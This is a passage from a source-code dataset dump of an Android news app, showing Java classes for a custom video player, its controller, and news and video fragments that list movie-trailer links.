itemView.findViewById(R.id.ky_video_player);\n LinearLayout.LayoutParams lp = (LinearLayout.LayoutParams) mVideoPlayer.getLayoutParams();\n lp.width = VideoUtil.getScreenWidth(mContext);\n lp.height = (VideoUtil.getScreenWidth(mContext) * 9)/16;\n mVideoPlayer.setLayoutParams(lp);\n }\n private void setController(KyVideoPlayerController controller) {\n mVideoController = controller;\n }\n private void bindData(VideoBean videos) {\n mVideoController.setTitle(videos.getTitle());\n mVideoController.setImage(videos.getImageUrl());\n mVideoPlayer.setController(mVideoController);\n mVideoPlayer.setUp(videos.getVideoUrl(), null);\n }\n }\n}\n" }, { "alpha_fraction": 0.6124638915061951, "alphanum_fraction": 0.6162997484207153, "avg_line_length": 32.127071380615234, "blob_id": "e83d04378bccae9b1e666eb1f0a16d00134c14f4", "content_id": "713922a200ff9e27389685e1efbb7bb24aedba18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 18724, "license_type": "no_license", "max_line_length": 101, "num_lines": 543, "path": "/app/src/main/java/com/example/ky4910/kynews/utils/KyVideoPlayer.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.utils;\n\nimport android.app.Activity;\nimport android.content.Context;\nimport android.content.pm.ActivityInfo;\nimport android.graphics.Color;\nimport 
android.graphics.SurfaceTexture;\nimport android.media.AudioManager;\nimport android.media.MediaPlayer;\nimport android.net.Uri;\nimport android.util.AttributeSet;\nimport android.view.Gravity;\nimport android.view.MotionEvent;\nimport android.view.Surface;\nimport android.view.TextureView;\nimport android.view.ViewGroup;\nimport android.view.WindowManager;\nimport android.widget.FrameLayout;\n\nimport java.io.IOException;\nimport java.util.Map;\n\npublic class KyVideoPlayer extends FrameLayout\n        implements KyVideoPlayerControl,\n        TextureView.SurfaceTextureListener {\n\n    public static final int STATE_ERROR = -1;          // playback error\n    public static final int STATE_IDLE = 0;            // playback not started\n    public static final int STATE_PREPARING = 1;       // preparing playback\n    public static final int STATE_PREPARED = 2;        // playback prepared\n    public static final int STATE_PLAYING = 3;         // playing\n    public static final int STATE_PAUSED = 4;          // playback paused\n    /**\n     * Buffering (buffered data ran low while the player was playing; playback resumes once enough data has been buffered)\n     **/\n    public static final int STATE_BUFFERING_PLAYING = 5;\n    /**\n     * Buffering while paused (buffered data ran low during playback, the player was paused while buffering continues, and it stays paused once enough data has been buffered)\n     **/\n    public static final int STATE_BUFFERING_PAUSED = 6;\n    public static final int STATE_COMPLETED = 7;       // playback completed\n\n    public static final int PLAYER_NORMAL = 10;        // normal embedded player\n    public static final int PLAYER_FULL_SCREEN = 11;   // full-screen player\n    public static final int PLAYER_TINY_WINDOW = 12;   // tiny-window player\n\n    private int mCurrentState = STATE_IDLE;\n    private int mPlayerState = PLAYER_NORMAL;\n\n    private Context mContext;\n    private FrameLayout mContainer;\n    private TextureView mTextureView;\n    private KyVideoPlayerController mController;\n    private SurfaceTexture mSurfaceTexture;\n    private String mUrl;\n    private Map<String, String> mHeaders;\n    private MediaPlayer mMediaPlayer;\n\n    private int mBufferPercentage;\n\n    public KyVideoPlayer(Context context) {\n        this(context, null);\n    }\n\n    public KyVideoPlayer(Context context, AttributeSet attrs) {\n        super(context, attrs);\n        mContext = context;\n        init();\n    }\n\n    private void init() {\n        mContainer = new FrameLayout(mContext);\n        mContainer.setBackgroundColor(Color.BLACK);\n        LayoutParams params = new LayoutParams(\n                ViewGroup.LayoutParams.MATCH_PARENT,\n                ViewGroup.LayoutParams.MATCH_PARENT);\n        this.addView(mContainer, params);\n    }\n\n    public void setUp(String url, Map<String, String> headers) {\n        mUrl = url;\n        mHeaders = headers;\n    }\n\n    public void setController(KyVideoPlayerController controller) {\n        mController = controller;\n        mController.setKyVideoPlayer(this);\n        mContainer.removeView(mController);\n        LayoutParams params = new LayoutParams(\n                ViewGroup.LayoutParams.MATCH_PARENT,\n                ViewGroup.LayoutParams.MATCH_PARENT);\n        mContainer.addView(mController, params);\n    }\n\n    @Override\n    public void start() {\n        KyVideoPlayerManager.instance().releaseKyVideoPlayer();\n        KyVideoPlayerManager.instance().setCurrentKyVideoPlayer(this);\n        if (mCurrentState == STATE_IDLE || mCurrentState == STATE_ERROR\n                || mCurrentState == STATE_COMPLETED) {\n            initMediaPlayer();\n            initTextureView();\n            addTextureView();\n        }\n    }\n\n    private void initMediaPlayer() {\n        if (mMediaPlayer == null) {\n            mMediaPlayer = new MediaPlayer();\n\n            mMediaPlayer.setAudioStreamType(AudioManager.STREAM_MUSIC);\n            mMediaPlayer.setScreenOnWhilePlaying(true);\n\n            mMediaPlayer.setOnPreparedListener(mOnPreparedListener);\n            mMediaPlayer.setOnVideoSizeChangedListener(mOnVideoSizeChangedListener);\n            mMediaPlayer.setOnCompletionListener(mOnCompletionListener);\n            mMediaPlayer.setOnErrorListener(mOnErrorListener);\n            mMediaPlayer.setOnInfoListener(mOnInfoListener);\n            mMediaPlayer.setOnBufferingUpdateListener(mOnBufferingUpdateListener);\n        }\n    }\n\n    private void initTextureView() {\n        if (mTextureView == null) {\n            mTextureView = new TextureView(mContext);\n            mTextureView.setSurfaceTextureListener(this);\n        }\n    }\n\n    private void addTextureView() {\n        mContainer.removeView(mTextureView);\n        LayoutParams params = new LayoutParams(\n                ViewGroup.LayoutParams.MATCH_PARENT,\n                ViewGroup.LayoutParams.MATCH_PARENT);\n        mContainer.addView(mTextureView, 0, params);\n    }\n\n    private MediaPlayer.OnPreparedListener mOnPreparedListener\n            = new MediaPlayer.OnPreparedListener() {\n        @Override\n        public void onPrepared(MediaPlayer mp) {\n            mp.start();\n            mCurrentState = STATE_PREPARED;\n            mController.setControllerState(mPlayerState, mCurrentState);\n        }\n    };\n\n    private MediaPlayer.OnVideoSizeChangedListener mOnVideoSizeChangedListener\n            = new MediaPlayer.OnVideoSizeChangedListener() {\n        @Override\n        public void onVideoSizeChanged(MediaPlayer mp, int width, int height) {\n\n        }\n    };\n\n    private MediaPlayer.OnCompletionListener mOnCompletionListener\n            = new MediaPlayer.OnCompletionListener() {\n        @Override\n        public void onCompletion(MediaPlayer mp) {\n            mCurrentState = STATE_COMPLETED;\n            mController.setControllerState(mPlayerState, mCurrentState);\n            KyVideoPlayerManager.instance().setCurrentKyVideoPlayer(null);\n        }\n    };\n\n    private MediaPlayer.OnErrorListener mOnErrorListener\n            = new MediaPlayer.OnErrorListener() {\n        @Override\n        public boolean onError(MediaPlayer mp, int what, int extra) {\n            mCurrentState = STATE_ERROR;\n            mController.setControllerState(mPlayerState, mCurrentState);\n            return false;\n        }\n    };\n\n    private MediaPlayer.OnInfoListener mOnInfoListener\n            = new MediaPlayer.OnInfoListener() {\n        @Override\n        public boolean onInfo(MediaPlayer mp, int what, int extra) {\n            if (what == MediaPlayer.MEDIA_INFO_VIDEO_RENDERING_START) {\n                // The player has rendered its first frame\n                mCurrentState = STATE_PLAYING;\n                mController.setControllerState(mPlayerState, mCurrentState);\n            } else if (what == MediaPlayer.MEDIA_INFO_BUFFERING_START) {\n                // MediaPlayer temporarily stops playing in order to buffer more data\n                if (mCurrentState == STATE_PAUSED || mCurrentState == STATE_BUFFERING_PAUSED) {\n                    mCurrentState = STATE_BUFFERING_PAUSED;\n                } else {\n                    mCurrentState = STATE_BUFFERING_PLAYING;\n                }\n                mController.setControllerState(mPlayerState, mCurrentState);\n            } else if (what == MediaPlayer.MEDIA_INFO_BUFFERING_END) {\n                // After the buffer refills, MediaPlayer returns to playing/paused\n                if (mCurrentState == STATE_BUFFERING_PLAYING) {\n                    mCurrentState = STATE_PLAYING;\n                    mController.setControllerState(mPlayerState, mCurrentState);\n                }\n                if (mCurrentState == STATE_BUFFERING_PAUSED) {\n                    mCurrentState = STATE_PAUSED;\n                    mController.setControllerState(mPlayerState, mCurrentState);\n                }\n            }\n            return true;\n        }\n    };\n\n    private MediaPlayer.OnBufferingUpdateListener mOnBufferingUpdateListener\n            = new MediaPlayer.OnBufferingUpdateListener() {\n        @Override\n        public void onBufferingUpdate(MediaPlayer mp, int percent) {\n            mBufferPercentage = percent;\n        }\n    };\n\n    /**\n     * Enter full screen: remove mContainer (which holds mTextureView and mController) from its current parent and add it to android.R.id.content.\n     */\n    @Override\n    public void enterFullScreen() {\n        if (mPlayerState == PLAYER_FULL_SCREEN) return;\n\n        // Hide the ActionBar and status bar, and switch to landscape\n        VideoUtil.hideActionBar(mContext);\n        VideoUtil.scanForActivity(mContext)\n                .setRequestedOrientation(ActivityInfo.SCREEN_ORIENTATION_LANDSCAPE);\n\n        this.removeView(mContainer);\n        ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n                .findViewById(android.R.id.content);\n        LayoutParams params = new LayoutParams(\n                ViewGroup.LayoutParams.MATCH_PARENT,\n                ViewGroup.LayoutParams.MATCH_PARENT);\n        contentView.addView(mContainer, params);\n\n        mPlayerState = PLAYER_FULL_SCREEN;\n        mController.setControllerState(mPlayerState, mCurrentState);\n    }\n\n    /**\n     * Exit full screen: remove mTextureView and mController and add them back to the non-full-screen container.\n     *\n     * @return true if full screen was exited.\n     */\n    @Override\n    public boolean exitFullScreen() {\n        if (mPlayerState == PLAYER_FULL_SCREEN) {\n            VideoUtil.showActionBar(mContext);\n            VideoUtil.scanForActivity(mContext)\n                    .setRequestedOrientation(ActivityInfo.SCREEN_ORIENTATION_PORTRAIT);\n\n            ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n                    .findViewById(android.R.id.content);\n            contentView.removeView(mContainer);\n            LayoutParams params = new LayoutParams(\n                    ViewGroup.LayoutParams.MATCH_PARENT,\n                    ViewGroup.LayoutParams.MATCH_PARENT);\n            this.addView(mContainer, params);\n\n            mPlayerState = PLAYER_NORMAL;\n            mController.setControllerState(mPlayerState, mCurrentState);\n            return true;\n        }\n        return false;\n    }\n\n    /**\n     * Enter tiny-window playback; it works on the same principle as full-screen playback.\n     */\n    @Override\n    public void enterTinyWindow() {\n        if (mPlayerState == PLAYER_TINY_WINDOW) return;\n        this.removeView(mContainer);\n\n        ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n                .findViewById(android.R.id.content);\n        // The tiny window is 60% of the screen width with a default 16:9 aspect ratio and 8dp right/bottom margins.\n        LayoutParams params = new LayoutParams(\n                (int) (VideoUtil.getScreenWidth(mContext) * 0.6f),\n                (int) (VideoUtil.getScreenWidth(mContext) * 0.6f * 9f / 16f));\n        params.gravity = Gravity.BOTTOM | Gravity.END;\n        params.rightMargin = VideoUtil.dp2px(mContext, 8f);\n        params.bottomMargin = VideoUtil.dp2px(mContext, 8f);\n\n        contentView.addView(mContainer, params);\n\n        mPlayerState = PLAYER_TINY_WINDOW;\n        mController.setControllerState(mPlayerState, mCurrentState);\n    }\n\n    /**\n     * Exit tiny-window playback.\n     */\n    @Override\n    public boolean exitTinyWindow() {\n        if (mPlayerState == PLAYER_TINY_WINDOW) {\n            ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n                    .findViewById(android.R.id.content);\n            contentView.removeView(mContainer);\n            LayoutParams params = new LayoutParams(\n                    ViewGroup.LayoutParams.MATCH_PARENT,\n                    ViewGroup.LayoutParams.MATCH_PARENT);\n            this.addView(mContainer, params);\n\n            mPlayerState = PLAYER_NORMAL;\n            mController.setControllerState(mPlayerState, mCurrentState);\n            return true;\n        }\n        return false;\n    }\n\n    @Override\n    public void release() {\n        if (mMediaPlayer != null) {\n            mMediaPlayer.release();\n            mMediaPlayer = null;\n        }\n        mContainer.removeView(mTextureView);\n        if (mSurfaceTexture != null) {\n            mSurfaceTexture.release();\n            mSurfaceTexture = null;\n        }\n        if (mController != null) {\n            mController.reset();\n        }\n        mCurrentState = STATE_IDLE;\n        mPlayerState = PLAYER_NORMAL;\n    }\n\n\n    @Override\n    public void restart() {\n        if (mCurrentState == STATE_PAUSED) {\n            mMediaPlayer.start();\n            mCurrentState = STATE_PLAYING;\n            mController.setControllerState(mPlayerState, mCurrentState);\n        }\n        if (mCurrentState == STATE_BUFFERING_PAUSED) {\n            mMediaPlayer.start();\n            mCurrentState = STATE_BUFFERING_PLAYING;\n            mController.setControllerState(mPlayerState, mCurrentState);\n        }\n    }\n\n    @Override\n    public void pause() {\n        if (mCurrentState == STATE_PLAYING) {\n            mMediaPlayer.pause();\n            mCurrentState = STATE_PAUSED;\n            mController.setControllerState(mPlayerState, mCurrentState);\n        }\n        if (mCurrentState == STATE_BUFFERING_PLAYING) {\n            mMediaPlayer.pause();\n            mCurrentState = STATE_BUFFERING_PAUSED;\n
mController.setControllerState(mPlayerState, mCurrentState);\n        }\n    }\n\n    @Override\n    public void seekTo(int pos) {\n        if (mMediaPlayer != null) {\n            mMediaPlayer.seekTo(pos);\n        }\n    }\n\n    @Override\n    public boolean isIdle() {\n        return mCurrentState == STATE_IDLE;\n    }\n\n    @Override\n    public boolean isPreparing() {\n        return mCurrentState == STATE_PREPARING;\n    }\n\n    @Override\n    public boolean isPrepared() {\n        return mCurrentState == STATE_PREPARED;\n    }\n\n    @Override\n    public boolean isBufferingPlaying() {\n        return mCurrentState == STATE_BUFFERING_PLAYING;\n    }\n\n    @Override\n    public boolean isBufferingPaused() {\n        return mCurrentState == STATE_BUFFERING_PAUSED;\n    }\n\n    @Override\n    public boolean isPlaying() {\n        return mCurrentState == STATE_PLAYING;\n    }\n\n    @Override\n    public boolean isPaused() {\n        return mCurrentState == STATE_PAUSED;\n    }\n\n    @Override\n    public boolean isError() {\n        return mCurrentState == STATE_ERROR;\n    }\n\n    @Override\n    public boolean isCompleted() {\n        return mCurrentState == STATE_COMPLETED;\n    }\n\n    @Override\n    public boolean isFullScreen() {\n        // Compare against mPlayerState: the PLAYER_* constants are never assigned to mCurrentState,\n        // so the original mCurrentState comparison could never be true.\n        return mPlayerState == PLAYER_FULL_SCREEN;\n    }\n\n    @Override\n    public boolean isTinyWindow() {\n        return mPlayerState == PLAYER_TINY_WINDOW;\n    }\n\n    @Override\n    public boolean isNormal() {\n        return mPlayerState == PLAYER_NORMAL;\n    }\n\n    @Override\n    public int getDuration() {\n        return mMediaPlayer != null ? mMediaPlayer.getDuration() : 0;\n    }\n\n    @Override\n    public int getCurrentPosition() {\n        return mMediaPlayer != null ? mMediaPlayer.getCurrentPosition() : 0;\n    }\n\n    @Override\n    public int getBufferPercentage() {\n        return mBufferPercentage;\n    }\n\n    @Override\n    public void onSurfaceTextureAvailable(SurfaceTexture surface, int width, int height) {\n        if (mSurfaceTexture == null) {\n            mSurfaceTexture = surface;\n            openMediaPlayer();\n        } else {\n            mTextureView.setSurfaceTexture(mSurfaceTexture);\n        }\n    }\n\n    private void openMediaPlayer() {\n        try {\n            mMediaPlayer.setDataSource(mContext.getApplicationContext(), Uri.parse(mUrl), mHeaders);\n            mMediaPlayer.setSurface(new Surface(mSurfaceTexture));\n            mMediaPlayer.prepareAsync();\n            mCurrentState = STATE_PREPARING;\n            mController.setControllerState(mPlayerState, mCurrentState);\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n    }\n\n    @Override\n    public void onSurfaceTextureSizeChanged(SurfaceTexture surface, int width, int height) {\n\n    }\n\n    @Override\n    public boolean onSurfaceTextureDestroyed(SurfaceTexture surface) {\n        return mSurfaceTexture == null;\n    }\n\n    @Override\n    public void onSurfaceTextureUpdated(SurfaceTexture surface) {\n\n    }\n\n    //////////////////////////////////////////////////////////////////\n    // Determines the swipe direction and handles volume and video-progress adjustment\n    private float startY = 0; // Y coordinate where the finger went down\n    private float startX = 0; // X coordinate where the finger went down\n\n    private int dip2px(float dipValue) {\n        final float scale = getContext().getResources().getDisplayMetrics().density;\n        return (int) (dipValue * scale + 0.5f);\n    }\n\n    @Override\n    public boolean onTouchEvent(MotionEvent event) {\n        int screenWidth = dip2px(300);\n        switch (event.getAction()) {\n            case MotionEvent.ACTION_DOWN:\n\n                startX = event.getX();\n                startY = event.getY();\n                break;\n            case MotionEvent.ACTION_MOVE:\n\n                float endY = event.getY();\n                float distanceY = startY - endY;\n                if (startX > screenWidth / 2) {\n                    // Right half of the screen: volume would be handled here\n                } else {\n                    // Left half of the screen: swipe up raises brightness, swipe down lowers it\n                    final double FLING_MIN_DISTANCE = 0.5;\n                    final double FLING_MIN_VELOCITY = 0.5;\n                    if (distanceY > FLING_MIN_DISTANCE && Math.abs(distanceY) > FLING_MIN_VELOCITY) {\n                        setBrightness(10);\n                    }\n                    if (distanceY < FLING_MIN_DISTANCE && Math.abs(distanceY) > FLING_MIN_VELOCITY) {\n                        setBrightness(-10);\n                    }\n                }\n                break;\n            case MotionEvent.ACTION_UP:\n                break;\n        }\n        return false;\n    }\n\n    /*\n     * Sets the screen brightness.\n     * 0 is darkest\n     * 1 is brightest\n     */\n    public void setBrightness(float brightness) {\n        WindowManager.LayoutParams lp = ((Activity)mContext).getWindow().getAttributes();\n        lp.screenBrightness = lp.screenBrightness + brightness / 255.0f;\n        if (lp.screenBrightness > 1) {\n            lp.screenBrightness = 1;\n        } else if (lp.screenBrightness < 0.1) {\n            lp.screenBrightness = (float) 0.1;\n        }\n        ((Activity)mContext).getWindow().setAttributes(lp);\n    }\n}\n" }, { "alpha_fraction": 0.6523935198783875, "alphanum_fraction": 0.6561264991760254, "avg_line_length": 30.846153259277344, "blob_id": "1016b5bd77db6689ba02d53cbdf45aa11c719205", "content_id": "67052c0d8683660c158c46c5cdbdf9177ab41a9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4590, "license_type": "no_license", "max_line_length": 132, "num_lines": 143, "path": "/app/src/main/java/com/example/ky4910/kynews/view/fragment/NewsFragment.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.view.fragment;\n\nimport android.os.Bundle;\nimport android.support.annotation.NonNull;\nimport android.support.annotation.Nullable;\nimport android.support.design.widget.TabLayout;\nimport android.support.v4.app.Fragment;\nimport android.support.v4.view.PagerAdapter;\nimport android.support.v4.view.ViewPager;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.TextView;\n\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.adapter.NewsFragmentPageAdapter;\n\nimport butterknife.BindView;\nimport butterknife.ButterKnife;\n\npublic class NewsFragment extends Fragment{\n\n    @BindView(R.id.tab_layout)\n    TabLayout tabLayout;\n    @BindView(R.id.view_pager)\n    ViewPager viewPager;\n\n    private PagerAdapter pagerAdapter;\n\n    //tab titles\n    private final int[] TAB_TITLES = new int[]{R.string.mainNews, R.string.sportsNews, R.string.techNews};\n\n    @Override\n    public void onCreate(@Nullable Bundle savedInstanceState) {\n        super.onCreate(savedInstanceState);\n\n        /*\n        newTypes.add(\"要闻\");\n        newTypes.add(\"娱乐\");\n        newTypes.add(\"财经\");\n\n        pagerAdapter = new MyFragmentPagerAdapter(getChildFragmentManager(), newTypes, mTabFragment);\n        viewPager.setAdapter(pagerAdapter);\n        */\n    }\n\n    @Nullable\n    @Override\n    public View onCreateView(@NonNull LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {\n        View view = inflater.inflate(R.layout.fragment_news, container, false);\n        ButterKnife.bind(this, view);\n\n        initPager();\n        setTabs(tabLayout, getLayoutInflater(), TAB_TITLES);\n\n        return view;\n    }\n\n    private void initPager() {\n        pagerAdapter = new NewsFragmentPageAdapter(getFragmentManager());\n        viewPager.setAdapter(pagerAdapter);\n\n        viewPager.addOnPageChangeListener(new TabLayout.TabLayoutOnPageChangeListener(tabLayout));\n        tabLayout.addOnTabSelectedListener(new TabLayout.OnTabSelectedListener() {\n            @Override\n            public void onTabSelected(TabLayout.Tab tab) {\n                // Switch tabs without smooth scrolling\n                viewPager.setCurrentItem(tab.getPosition(), false);\n            }\n\n            @Override\n            public void onTabUnselected(TabLayout.Tab tab) {\n\n            }\n\n            @Override\n            public void onTabReselected(TabLayout.Tab tab) 
{\n\n }\n });\n }\n\n private void setTabs(TabLayout tabLayout, LayoutInflater inflater, int[] tabTitles){\n for (int i = 0; i < tabTitles.length; i++) {\n TabLayout.Tab tab = tabLayout.newTab();\n View view = inflater.inflate(R.layout.item_main_menu, null);\n tab.setCustomView(view);\n\n TextView tvTitle = view.findViewById(R.id.txt_tab);\n tvTitle.setText(tabTitles[i]);\n tabLayout.addTab(tab);\n }\n }\n}\n\n\n\n/*\n private void initPager() {\n pagerAdapter = new NewsFragmentPageAdapter(getSupportFragmentManager());\n viewPager.setAdapter(pagerAdapter);\n\n viewPager.addOnPageChangeListener(new TabLayout.TabLayoutOnPageChangeListener(tabLayout));\n tabLayout.addOnTabSelectedListener(new TabLayout.OnTabSelectedListener() {\n @Override\n public void onTabSelected(TabLayout.Tab tab) {\n //取消平滑切换\n viewPager.setCurrentItem(tab.getPosition(), false);\n }\n\n @Override\n public void onTabUnselected(TabLayout.Tab tab) {\n\n }\n\n @Override\n public void onTabReselected(TabLayout.Tab tab) {\n\n }\n });\n }\n\n private void setTabs(TabLayout tabLayout, LayoutInflater inflater, int[] tabTitles, int[] tabImages){\n for (int i = 0; i < tabImages.length; i++) {\n TabLayout.Tab tab = tabLayout.newTab();\n View view = inflater.inflate(R.layout.item_main_menu, null);\n tab.setCustomView(view);\n\n TextView tvTitle = (TextView)view.findViewById(R.id.txt_tab);\n tvTitle.setText(tabTitles[i]);\n ImageView imgTab = (ImageView)view.findViewById(R.id.img_tab);\n imgTab.setImageResource(tabImages[i]);\n tabLayout.addTab(tab);\n }\n }\n\n protected void initViews() {\n //create tab and pager fragment\n FragmentManager fragmentManager = getSupportFragmentManager();\n fragmentManager.beginTransaction().add(R.id.container, new NewsTabAndPagerFragment()).commit();\n }\n}\n*/\n" }, { "alpha_fraction": 0.5521860122680664, "alphanum_fraction": 0.6762698888778687, "avg_line_length": 42.010868072509766, "blob_id": "7c5931de3d3264231e39e34ccaec07d0aad1a909", "content_id": "3d5b9f0c33ef259fadc3d4c98b1cb9abc33d82be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4225, "license_type": "no_license", "max_line_length": 132, "num_lines": 92, "path": "/app/src/main/java/com/example/ky4910/kynews/view/fragment/VideoFragment.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.view.fragment;\n\nimport android.os.Bundle;\nimport android.support.annotation.NonNull;\nimport android.support.annotation.Nullable;\nimport android.support.v4.app.Fragment;\nimport android.support.v7.widget.LinearLayoutManager;\nimport android.support.v7.widget.RecyclerView;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\n\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.adapter.VideoRvAdapter;\nimport com.example.ky4910.kynews.model.entity.VideoBean;\n\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.InputStreamReader;\nimport java.util.ArrayList;\nimport java.util.List;\n\n// http://api.m.mtime.cn/PageSubArea/TrailerList.api\n\npublic class VideoFragment extends Fragment {\n\n private View view;\n private RecyclerView recyclerView;\n private List<VideoBean> videoBeanList = new ArrayList<>();\n private VideoRvAdapter videoAdapter;\n\n public VideoFragment() {\n }\n\n @Override\n public void onCreate(@Nullable Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n }\n\n @Nullable\n @Override\n public View 
onCreateView(@NonNull LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {\n view = inflater.inflate(R.layout.fragment_videos, container, false);\n recyclerView = view.findViewById(R.id.video_rv);\n recyclerView.setLayoutManager(new LinearLayoutManager(getActivity()));\n initData();\n if (videoAdapter == null) {\n videoAdapter = new VideoRvAdapter(this.getActivity(), videoBeanList);\n recyclerView.setAdapter(videoAdapter);\n } else {\n videoAdapter.notifyDataSetChanged();\n }\n return view;\n }\n\n private void initData() {\n VideoBean bean1 = new VideoBean(\"《速度与激情:特别行动》曝全新中文预告\",\n \"http://img5.mtime.cn/mg/2019/06/29/002009.16684021_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/29/mp4/190629004821240734.mp4\");\n VideoBean bean2 = new VideoBean(\"《决战中途岛》预告再现海空激战\",\n \"http://img5.mtime.cn/mg/2019/06/27/231348.59732586_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627231412433967.mp4\");\n VideoBean bean3 = new VideoBean(\"小K领衔新版《霹雳娇娃》帅酷预告\",\n \"http://img5.mtime.cn/mg/2019/06/27/224744.68512147_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/28/mp4/190628075308350550.mp4\");\n VideoBean bean4 = new VideoBean(\"郑秀文《花椒之味》预告刘德华客串\",\n \"http://img5.mtime.cn/mg/2019/06/27/225551.29349352_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627225613276924.mp4\");\n VideoBean bean5 = new VideoBean(\"张晋《九龙不败》终极预告现飞龙出海\",\n \"http://img5.mtime.cn/mg/2019/06/27/104144.36321374_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627104751316049.mp4\");\n VideoBean bean6 = new VideoBean(\"伊恩麦克莱恩、海伦米伦《优秀的骗子》预告\",\n \"http://img5.mtime.cn/mg/2019/06/27/104649.48931556_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627104816316366.mp4\");\n VideoBean bean7 = new VideoBean(\"《铤而走险》大鹏欧豪雨夜亡命追击\",\n \"http://img5.mtime.cn/mg/2019/06/21/175640.99146689_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/21/mp4/190621175731672800.mp4\");\n VideoBean bean8 = new VideoBean(\"恐怖喜剧片《准备好了没》发红标预告\",\n \"http://img5.mtime.cn/mg/2019/06/18/231051.97747383_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/18/mp4/190618231303510938.mp4\");\n\n videoBeanList.add(bean1);\n videoBeanList.add(bean2);\n videoBeanList.add(bean3);\n videoBeanList.add(bean4);\n videoBeanList.add(bean5);\n videoBeanList.add(bean6);\n videoBeanList.add(bean7);\n videoBeanList.add(bean8);\n }\n}\n" }, { "alpha_fraction": 0.6015861630439758, "alphanum_fraction": 0.6043853759765625, "avg_line_length": 34.04359817504883, "blob_id": "217a77f34c63d54d0be4b002a7252b8941f81b4c", "content_id": "a474fc2677d14b898cd23a5f038bb165248bc9dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 12931, "license_type": "no_license", "max_line_length": 92, "num_lines": 367, "path": "/app/src/main/java/com/example/ky4910/kynews/utils/KyVideoPlayerController.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.utils;\n\nimport android.content.Context;\nimport android.os.CountDownTimer;\nimport android.support.annotation.DrawableRes;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.widget.FrameLayout;\nimport android.widget.ImageView;\nimport android.widget.LinearLayout;\nimport android.widget.SeekBar;\nimport android.widget.TextView;\nimport android.widget.Toast;\n\nimport com.bumptech.glide.Glide;\nimport com.bumptech.glide.request.RequestOptions;\nimport com.example.ky4910.kynews.R;\n\nimport 
java.util.Timer;\nimport java.util.TimerTask;\n\n/**\n * Created by kimber on 2019/07/16\n * Video Player Controller\n */\n\npublic class KyVideoPlayerController extends FrameLayout\n implements View.OnClickListener, SeekBar.OnSeekBarChangeListener {\n\n private Context mContext;\n private KyVideoPlayerControl mKyVideoPlayer;\n private ImageView mImage;\n private ImageView mCenterStart;\n private LinearLayout ll_mTop;\n private ImageView mBack;\n private TextView mTitle;\n\n private LinearLayout ll_mBottom;\n private ImageView mRestartPause;\n private TextView mPosition;\n private TextView mDuration;\n private SeekBar mSeek;\n private ImageView mFullScreen;\n\n private LinearLayout ll_mLoading;\n private TextView mLoadText;\n\n private LinearLayout ll_mError;\n private TextView mRetry;\n\n private LinearLayout ll_mCompleted;\n private TextView mReplay;\n private TextView mShare;\n\n private Timer mUpdateProgressTimer;\n private TimerTask mUpdateProgressTimerTask;\n private boolean topBottomVisible;\n private CountDownTimer mDismissTopBottomCountDownTimer;\n\n public KyVideoPlayerController(Context context) {\n super(context);\n mContext = context;\n init();\n }\n\n private void init() {\n LayoutInflater.from(mContext).inflate(R.layout.video_player_controller, this, true);\n\n mImage = findViewById(R.id.iv_image);\n mCenterStart = findViewById(R.id.center_start);\n\n ll_mTop = findViewById(R.id.ll_top);\n mBack = findViewById(R.id.iv_back);\n mTitle = findViewById(R.id.tv_title);\n\n ll_mBottom = findViewById(R.id.ll_bottom);\n mRestartPause = findViewById(R.id.iv_restart_pause);\n mPosition = findViewById(R.id.tv_position);\n mDuration = findViewById(R.id.tv_duration);\n mSeek = findViewById(R.id.seek);\n mFullScreen = findViewById(R.id.iv_full_screen);\n\n ll_mLoading = findViewById(R.id.ll_loading);\n mLoadText = findViewById(R.id.tv_loading);\n\n ll_mError = findViewById(R.id.ll_error);\n mRetry = findViewById(R.id.tv_retry);\n\n ll_mCompleted = findViewById(R.id.ll_completed);\n mReplay = findViewById(R.id.tv_replay);\n mShare = findViewById(R.id.tv_share);\n\n mCenterStart.setOnClickListener(this);\n mBack.setOnClickListener(this);\n mRestartPause.setOnClickListener(this);\n mFullScreen.setOnClickListener(this);\n mRetry.setOnClickListener(this);\n mReplay.setOnClickListener(this);\n mShare.setOnClickListener(this);\n mSeek.setOnSeekBarChangeListener(this);\n this.setOnClickListener(this);\n }\n\n public void setTitle(String title) {\n mTitle.setText(title);\n }\n\n public void setImage(String imageUrl) {\n Glide.with(mContext)\n .load(imageUrl)\n .apply(new RequestOptions().error(R.drawable.default_img))\n 